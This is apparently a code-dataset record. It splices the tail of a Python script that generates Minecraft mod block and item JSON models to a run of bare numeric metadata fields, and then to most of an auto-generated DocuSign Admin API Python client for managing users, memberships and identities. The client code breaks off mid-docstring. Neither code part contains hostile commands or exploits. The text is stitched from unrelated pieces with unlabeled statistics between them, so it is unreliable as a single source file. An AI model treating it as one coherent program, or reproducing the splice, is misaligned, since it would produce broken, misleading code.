        item_model_file.write("{\n\t\"parent\": \"minecraft:item/handheld\",\n\t\"textures\": {\n\t\t\"layer0\": \"" + MOD_ID + ":item/" + item_id + "\"\n\t}\n}")
def generate_log_block(block_id):
    """Write blockstate + models for an axis-oriented (log/column) block.

    Produces four files: a blockstate mapping the x/y/z axis variants to the
    vertical and horizontal column models, the two block models, and an item
    model parented to the vertical block model. Directories must exist.
    """
    asset_root = get_asset_path() + MOD_ID
    # BUG FIX: the original never closed horizontal_block_model_file, so its
    # buffered content was only flushed at interpreter exit (and leaked the
    # handle); `with` closes every file deterministically.
    with open(asset_root + "/blockstates/" + block_id + ".json", "w") as blockstate_file:
        blockstate_file.write("{\n\t\"variants\": {\n\t\t\"axis=x\": {\n\t\t\t\"model\": \"" + MOD_ID + ":block/" + block_id + "_horizontal\",\n\t\t\t\"x\": 90,\n\t\t\t\"y\": 90\n\t\t},\n\t\t\"axis=y\": {\n\t\t\t\"model\": \"" + MOD_ID + ":block/" + block_id + "\"\n\t\t},\n\t\t\"axis=z\": {\n\t\t\t\"model\": \"" + MOD_ID + ":block/" + block_id + "_horizontal\",\n\t\t\t\"x\": 90\n\t\t}\n\t}\n}")
    with open(asset_root + "/models/block/" + block_id + ".json", "w") as block_model_file:
        block_model_file.write("{\n\t\"parent\": \"minecraft:block/cube_column\",\n\t\"textures\": {\n\t\t\"end\": \"" + MOD_ID + ":block/" + block_id + "_top\",\n\t\t\"side\": \"" + MOD_ID + ":block/" + block_id + "\"\n\t}\n}")
    with open(asset_root + "/models/block/" + block_id + "_horizontal.json", "w") as horizontal_block_model_file:
        horizontal_block_model_file.write("{\n\t\"parent\": \"minecraft:block/cube_column_horizontal\",\n\t\"textures\": {\n\t\t\"end\": \"" + MOD_ID + ":block/" + block_id + "_top\",\n\t\t\"side\":\"" + MOD_ID + ":block/" + block_id + "\"\n\t}\n}")
    with open(asset_root + "/models/item/" + block_id + ".json", "w") as item_model_file:
        item_model_file.write("{\n\t\"parent\": \"" + MOD_ID + ":block/" + block_id + "\"\n}")
def create_ore_set(ore_type):
    """Generate block + raw-item assets for an ore in all three deposit sizes."""
    # Same call order as writing each pair out by hand: small, medium, large.
    for size in ("small", "medium", "large"):
        generate_standard_block(ore_type + "_ore_" + size)
        generate_standard_item("raw_" + ore_type + "_" + size)
# Script entry point: generate the full asset set for copper/malachite ore.
create_ore_set("copper_malachite")
| 59.781818
| 369
| 0.645377
| 537
| 3,288
| 3.635009
| 0.108007
| 0.044057
| 0.033811
| 0.084529
| 0.875
| 0.875
| 0.769467
| 0.761783
| 0.761783
| 0.761783
| 0
| 0.002672
| 0.089416
| 3,288
| 55
| 370
| 59.781818
| 0.649299
| 0
| 0
| 0.428571
| 1
| 0
| 0.282761
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.02381
| 0.02381
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d3f37e9e9ed510a2d190cba04cd263c28c57a87
| 58,716
|
py
|
Python
|
docusign_admin/apis/users_api.py
|
docusign/docusign-admin-python-client
|
1b94d311e3203e99717f7e67446083ea4b399ea9
|
[
"MIT"
] | 1
|
2021-11-14T17:01:17.000Z
|
2021-11-14T17:01:17.000Z
|
docusign_admin/apis/users_api.py
|
docusign/docusign-admin-python-client
|
1b94d311e3203e99717f7e67446083ea4b399ea9
|
[
"MIT"
] | null | null | null |
docusign_admin/apis/users_api.py
|
docusign/docusign-admin-python-client
|
1b94d311e3203e99717f7e67446083ea4b399ea9
|
[
"MIT"
] | 1
|
2021-11-14T17:01:11.000Z
|
2021-11-14T17:01:11.000Z
|
# coding: utf-8
"""
DocuSign Admin API
An API for an organization administrator to manage organizations, accounts and users # noqa: E501
OpenAPI spec version: v2.1
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..client.configuration import Configuration
from ..client.api_client import ApiClient
class UsersApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def activate_membership(self, organization_id, user_id, membership_id, request, **kwargs):
"""
Activates user memberships
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.activate_membership(organization_id, user_id, membership_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param str user_id: The user ID Guid (required)
:param str membership_id: The membership ID Guid (required)
:param ForceActivateMembershipRequest request: Additional details about the user's membership (required)
:return: UpdateResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.activate_membership_with_http_info(organization_id, user_id, membership_id, request, **kwargs)
else:
(data) = self.activate_membership_with_http_info(organization_id, user_id, membership_id, request, **kwargs)
return data
    def activate_membership_with_http_info(self, organization_id, user_id, membership_id, request, **kwargs):
        """
        Activates user memberships
        Required scopes: user_write

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.activate_membership_with_http_info(organization_id, user_id, membership_id, request, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str organization_id: The organization ID Guid (required)
        :param str user_id: The user ID Guid (required)
        :param str membership_id: The membership ID Guid (required)
        :param ForceActivateMembershipRequest request: Additional details about the user's membership (required)
        :return: UpdateResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Every keyword argument this method accepts; anything else in
        # **kwargs is rejected with a TypeError below.
        all_params = ['organization_id', 'user_id', 'membership_id', 'request']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is captured as the working params dict and then
        # mutated — the explicit arguments and the contents of **kwargs are
        # flattened into one mapping (standard swagger-codegen pattern).
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method activate_membership" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'organization_id' is set
        if ('organization_id' not in params) or (params['organization_id'] is None):
            raise ValueError("Missing the required parameter `organization_id` when calling `activate_membership`")
        # verify the required parameter 'user_id' is set
        if ('user_id' not in params) or (params['user_id'] is None):
            raise ValueError("Missing the required parameter `user_id` when calling `activate_membership`")
        # verify the required parameter 'membership_id' is set
        if ('membership_id' not in params) or (params['membership_id'] is None):
            raise ValueError("Missing the required parameter `membership_id` when calling `activate_membership`")
        # verify the required parameter 'request' is set
        if ('request' not in params) or (params['request'] is None):
            raise ValueError("Missing the required parameter `request` when calling `activate_membership`")

        collection_formats = {}

        # '{format}' is a generator artifact; the API always speaks JSON.
        resource_path = '/v2/organizations/{organizationId}/users/{userId}/memberships/{membershipId}'.replace('{format}', 'json')
        path_params = {}
        if 'organization_id' in params:
            path_params['organizationId'] = params['organization_id']
        if 'user_id' in params:
            path_params['userId'] = params['user_id']
        if 'membership_id' in params:
            path_params['membershipId'] = params['membership_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        # The request model object is serialized as the JSON request body.
        body_params = None
        if 'request' in params:
            body_params = params['request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='UpdateResponse',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def add_or_update_user(self, organization_id, account_id, request, **kwargs):
"""
Creates and updates a multi-product user
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_or_update_user(organization_id, account_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID GUID (required)
:param str account_id: The account ID GUID (required)
:param NewMultiProductUserAddRequest request: The request object (required)
:return: AddUserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_or_update_user_with_http_info(organization_id, account_id, request, **kwargs)
else:
(data) = self.add_or_update_user_with_http_info(organization_id, account_id, request, **kwargs)
return data
    def add_or_update_user_with_http_info(self, organization_id, account_id, request, **kwargs):
        """
        Creates and updates a multi-product user
        Required scopes: user_write

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.add_or_update_user_with_http_info(organization_id, account_id, request, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str organization_id: The organization ID GUID (required)
        :param str account_id: The account ID GUID (required)
        :param NewMultiProductUserAddRequest request: The request object (required)
        :return: AddUserResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Every keyword argument this method accepts; anything else in
        # **kwargs is rejected with a TypeError below.
        all_params = ['organization_id', 'account_id', 'request']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is captured as the working params dict and then
        # mutated — explicit arguments plus **kwargs are flattened into one
        # mapping (standard swagger-codegen pattern).
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method add_or_update_user" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'organization_id' is set
        if ('organization_id' not in params) or (params['organization_id'] is None):
            raise ValueError("Missing the required parameter `organization_id` when calling `add_or_update_user`")
        # verify the required parameter 'account_id' is set
        if ('account_id' not in params) or (params['account_id'] is None):
            raise ValueError("Missing the required parameter `account_id` when calling `add_or_update_user`")
        # verify the required parameter 'request' is set
        if ('request' not in params) or (params['request'] is None):
            raise ValueError("Missing the required parameter `request` when calling `add_or_update_user`")

        collection_formats = {}

        # '{format}' is a generator artifact; the API always speaks JSON.
        resource_path = '/v2.1/organizations/{organizationId}/accounts/{accountId}/users'.replace('{format}', 'json')
        path_params = {}
        if 'organization_id' in params:
            path_params['organizationId'] = params['organization_id']
        if 'account_id' in params:
            path_params['accountId'] = params['account_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        # The request model object is serialized as the JSON request body.
        body_params = None
        if 'request' in params:
            body_params = params['request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = []

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='AddUserResponse',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def add_users(self, organization_id, account_id, request, **kwargs):
    """
    Adds users to an account.
    Required scopes: user_write

    By default this performs a blocking HTTP request and returns the
    deserialized response data. Supplying a `callback` keyword argument
    (a function invoked with the response) switches the call to
    asynchronous mode, in which case the request thread is returned.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param str account_id: The account ID Guid (required)
    :param NewAccountUserRequest request: The details for the users to add to the account (required)
    :return: NewUserResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper only exposes the payload, never the
    # (data, status, headers) triple the lower-level helper can return.
    kwargs['_return_http_data_only'] = True
    # Whether or not a callback was given, the helper's return value
    # (response data, or the request thread in async mode) is what the
    # caller receives.
    return self.add_users_with_http_info(organization_id, account_id, request, **kwargs)
def add_users_with_http_info(self, organization_id, account_id, request, **kwargs):
    """
    Adds users to an account.
    Required scopes: user_write
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.add_users_with_http_info(organization_id, account_id, request, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param str account_id: The account ID Guid (required)
    :param NewAccountUserRequest request: The details for the users to add to the account (required)
    :return: NewUserResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of keywords this method accepts: the endpoint's own
    # parameters plus the transport options shared by every API method.
    all_params = ['organization_id', 'account_id', 'request']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the named arguments, then fold **kwargs into the same
    # dict, rejecting any keyword not in the whitelist above.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_users" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'organization_id' is set
    if ('organization_id' not in params) or (params['organization_id'] is None):
        raise ValueError("Missing the required parameter `organization_id` when calling `add_users`")
    # verify the required parameter 'account_id' is set
    if ('account_id' not in params) or (params['account_id'] is None):
        raise ValueError("Missing the required parameter `account_id` when calling `add_users`")
    # verify the required parameter 'request' is set
    if ('request' not in params) or (params['request'] is None):
        raise ValueError("Missing the required parameter `request` when calling `add_users`")

    collection_formats = {}

    # Endpoint template; the '{format}' placeholder is generator legacy
    # and always resolves to 'json'.
    resource_path = '/v2/organizations/{organizationId}/accounts/{accountId}/users'.replace('{format}', 'json')
    path_params = {}
    if 'organization_id' in params:
        path_params['organizationId'] = params['organization_id']
    if 'account_id' in params:
        path_params['accountId'] = params['account_id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    # The request model object is serialized as the JSON request body.
    body_params = None
    if 'request' in params:
        body_params = params['request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = []

    # Delegate the HTTP POST to the shared API client, which performs
    # the call and deserializes the response into `response_type`.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='NewUserResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def close_memberships(self, organization_id, user_id, request, **kwargs):
    """
    Closes a user's memberships.
    Required scopes: user_write

    By default this performs a blocking HTTP request and returns the
    deserialized response data. Supplying a `callback` keyword argument
    (a function invoked with the response) switches the call to
    asynchronous mode, in which case the request thread is returned.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param str user_id: The user ID Guid (required)
    :param DeleteMembershipsRequest request: The details about which membership to close (required)
    :return: DeleteMembershipsResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this wrapper want only the payload, not the
    # (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The helper already returns the right thing in both modes: the
    # response data synchronously, or the request thread with a callback.
    return self.close_memberships_with_http_info(organization_id, user_id, request, **kwargs)
def close_memberships_with_http_info(self, organization_id, user_id, request, **kwargs):
    """
    Closes a user's memberships.
    Required scopes: user_write
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.close_memberships_with_http_info(organization_id, user_id, request, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param str user_id: The user ID Guid (required)
    :param DeleteMembershipsRequest request: The details about which membership to close (required)
    :return: DeleteMembershipsResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of keywords this method accepts: the endpoint's own
    # parameters plus the transport options shared by every API method.
    all_params = ['organization_id', 'user_id', 'request']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the named arguments, then fold **kwargs into the same
    # dict, rejecting any keyword not in the whitelist above.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method close_memberships" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'organization_id' is set
    if ('organization_id' not in params) or (params['organization_id'] is None):
        raise ValueError("Missing the required parameter `organization_id` when calling `close_memberships`")
    # verify the required parameter 'user_id' is set
    if ('user_id' not in params) or (params['user_id'] is None):
        raise ValueError("Missing the required parameter `user_id` when calling `close_memberships`")
    # verify the required parameter 'request' is set
    if ('request' not in params) or (params['request'] is None):
        raise ValueError("Missing the required parameter `request` when calling `close_memberships`")

    collection_formats = {}

    # Endpoint template; the '{format}' placeholder is generator legacy
    # and always resolves to 'json'.
    resource_path = '/v2/organizations/{organizationId}/users/{userId}/accounts'.replace('{format}', 'json')
    path_params = {}
    if 'organization_id' in params:
        path_params['organizationId'] = params['organization_id']
    if 'user_id' in params:
        path_params['userId'] = params['user_id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    # The request model (which memberships to close) is serialized as
    # the JSON request body of the DELETE.
    body_params = None
    if 'request' in params:
        body_params = params['request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = []

    # Delegate the HTTP DELETE to the shared API client, which performs
    # the call and deserializes the response into `response_type`.
    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DeleteMembershipsResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def create_user(self, organization_id, request, **kwargs):
    """
    Creates a new user
    Required scopes: user_write

    By default this performs a blocking HTTP request and returns the
    deserialized response data. Supplying a `callback` keyword argument
    (a function invoked with the response) switches the call to
    asynchronous mode, in which case the request thread is returned.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param NewUserRequest request: Details about the user to be added (required)
    :return: NewUserResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this wrapper want only the payload, not the
    # (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The helper already returns the right thing in both modes: the
    # response data synchronously, or the request thread with a callback.
    return self.create_user_with_http_info(organization_id, request, **kwargs)
def create_user_with_http_info(self, organization_id, request, **kwargs):
    """
    Creates a new user
    Required scopes: user_write
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.create_user_with_http_info(organization_id, request, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param NewUserRequest request: Details about the user to be added (required)
    :return: NewUserResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of keywords this method accepts: the endpoint's own
    # parameters plus the transport options shared by every API method.
    all_params = ['organization_id', 'request']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the named arguments, then fold **kwargs into the same
    # dict, rejecting any keyword not in the whitelist above.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_user" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'organization_id' is set
    if ('organization_id' not in params) or (params['organization_id'] is None):
        raise ValueError("Missing the required parameter `organization_id` when calling `create_user`")
    # verify the required parameter 'request' is set
    if ('request' not in params) or (params['request'] is None):
        raise ValueError("Missing the required parameter `request` when calling `create_user`")

    collection_formats = {}

    # Endpoint template; the '{format}' placeholder is generator legacy
    # and always resolves to 'json'.
    resource_path = '/v2/organizations/{organizationId}/users'.replace('{format}', 'json')
    path_params = {}
    if 'organization_id' in params:
        path_params['organizationId'] = params['organization_id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    # The request model object is serialized as the JSON request body.
    body_params = None
    if 'request' in params:
        body_params = params['request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = []

    # Delegate the HTTP POST to the shared API client, which performs
    # the call and deserializes the response into `response_type`.
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='NewUserResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def delete_identities(self, organization_id, user_id, request_model, **kwargs):
    """
    Deletes user identities.
    Required scopes: user_write

    By default this performs a blocking HTTP request and returns the
    deserialized response data. Supplying a `callback` keyword argument
    (a function invoked with the response) switches the call to
    asynchronous mode, in which case the request thread is returned.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param str user_id: The user ID Guid (required)
    :param DeleteUserIdentityRequest request_model: The details for the user identities to be deleted (required)
    :return: DeleteResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this wrapper want only the payload, not the
    # (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The helper already returns the right thing in both modes: the
    # response data synchronously, or the request thread with a callback.
    return self.delete_identities_with_http_info(organization_id, user_id, request_model, **kwargs)
def delete_identities_with_http_info(self, organization_id, user_id, request_model, **kwargs):
    """
    Deletes user identities.
    Required scopes: user_write
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.delete_identities_with_http_info(organization_id, user_id, request_model, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param str user_id: The user ID Guid (required)
    :param DeleteUserIdentityRequest request_model: The details for the user identities to be deleted (required)
    :return: DeleteResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of keywords this method accepts: the endpoint's own
    # parameters plus the transport options shared by every API method.
    all_params = ['organization_id', 'user_id', 'request_model']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the named arguments, then fold **kwargs into the same
    # dict, rejecting any keyword not in the whitelist above.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_identities" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'organization_id' is set
    if ('organization_id' not in params) or (params['organization_id'] is None):
        raise ValueError("Missing the required parameter `organization_id` when calling `delete_identities`")
    # verify the required parameter 'user_id' is set
    if ('user_id' not in params) or (params['user_id'] is None):
        raise ValueError("Missing the required parameter `user_id` when calling `delete_identities`")
    # verify the required parameter 'request_model' is set
    if ('request_model' not in params) or (params['request_model'] is None):
        raise ValueError("Missing the required parameter `request_model` when calling `delete_identities`")

    collection_formats = {}

    # Endpoint template; the '{format}' placeholder is generator legacy
    # and always resolves to 'json'.
    resource_path = '/v2/organizations/{organizationId}/users/{userId}/identities'.replace('{format}', 'json')
    path_params = {}
    if 'organization_id' in params:
        path_params['organizationId'] = params['organization_id']
    if 'user_id' in params:
        path_params['userId'] = params['user_id']

    query_params = {}

    header_params = {}

    form_params = []
    local_var_files = {}

    # The request model (which identities to delete) is serialized as
    # the JSON request body of the DELETE.
    body_params = None
    if 'request_model' in params:
        body_params = params['request_model']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = []

    # Delegate the HTTP DELETE to the shared API client, which performs
    # the call and deserializes the response into `response_type`.
    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='DeleteResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def get_user_profiles(self, organization_id, **kwargs):
    """
    Returns user information.
    Required scopes: user_read

    By default this performs a blocking HTTP request and returns the
    deserialized response data. Supplying a `callback` keyword argument
    (a function invoked with the response) switches the call to
    asynchronous mode, in which case the request thread is returned.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param str email: The email address
    :return: UsersDrilldownResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this wrapper want only the payload, not the
    # (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The helper already returns the right thing in both modes: the
    # response data synchronously, or the request thread with a callback.
    return self.get_user_profiles_with_http_info(organization_id, **kwargs)
def get_user_profiles_with_http_info(self, organization_id, **kwargs):
    """
    Returns user information.
    Required scopes: user_read
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>> pprint(response)
    >>>
    >>> thread = api.get_user_profiles_with_http_info(organization_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str organization_id: The organization ID Guid (required)
    :param str email: The email address
    :return: UsersDrilldownResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Whitelist of keywords this method accepts: the endpoint's own
    # parameters plus the transport options shared by every API method.
    all_params = ['organization_id', 'email']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the named arguments, then fold **kwargs into the same
    # dict, rejecting any keyword not in the whitelist above.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_user_profiles" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'organization_id' is set
    if ('organization_id' not in params) or (params['organization_id'] is None):
        raise ValueError("Missing the required parameter `organization_id` when calling `get_user_profiles`")

    collection_formats = {}

    # Endpoint template; the '{format}' placeholder is generator legacy
    # and always resolves to 'json'.
    resource_path = '/v2/organizations/{organizationId}/users/profile'.replace('{format}', 'json')
    path_params = {}
    if 'organization_id' in params:
        path_params['organizationId'] = params['organization_id']

    # Optional filter, sent as a query-string parameter when provided.
    query_params = {}
    if 'email' in params:
        query_params['email'] = params['email']

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no request body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = []

    # Delegate the HTTP GET to the shared API client, which performs
    # the call and deserializes the response into `response_type`.
    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='UsersDrilldownResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def get_users(self, organization_id, **kwargs):
    """
    Returns information about the users in the organization
    Required scopes: user_read

    By default this performs a blocking HTTP request and returns the
    deserialized response data. Supplying a `callback` keyword argument
